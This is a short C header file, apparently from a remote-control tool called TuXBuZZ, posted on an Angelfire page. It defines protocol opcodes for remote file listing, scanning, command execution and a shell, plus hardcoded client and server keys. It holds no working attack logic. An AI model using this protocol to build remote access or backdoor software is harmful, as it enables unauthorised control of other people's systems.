Site hosted by Angelfire.com: Build your free website today!
/**************************************************************************
TuXBuZZ - bY DoC#include
messages.h
**************************************************************************/

#ifndef MESSAGES_H
#define MESSAGES_H

#define MSG_CONNECT      0x01
#define MSG_DISCONNECT   0x02
#define MSG_GET          0x03
#define MSG_RINFO        0x04
#define MSG_RINFO_REMOTE 0x05
#define MSG_RINFO_USER   0x06
#define MSG_QUIT         0x07
#define MSG_HELP         0x08
#define MSG_CONTINUE     0x09
#define MSG_STOP         0x0a
#define MSG_SCAN         0x0b
#define MSG_LS           0x0c
#define MSG_CHDIR        0x0d
#define MSG_PWD          0x0e
#define MSG_EXEC         0x0f
#define MSG_LOCAL_SHELL_CMD    0x10

#define TUXBUZZKEY_CLIENT "AaYuiYttRe45%)9)-_==+ttY"
#define TUXBUZZKEY_SERVER  "Ytt+==_-)9)%54eRttYiuYaA"
        
#endif

/* fim de messages.h*/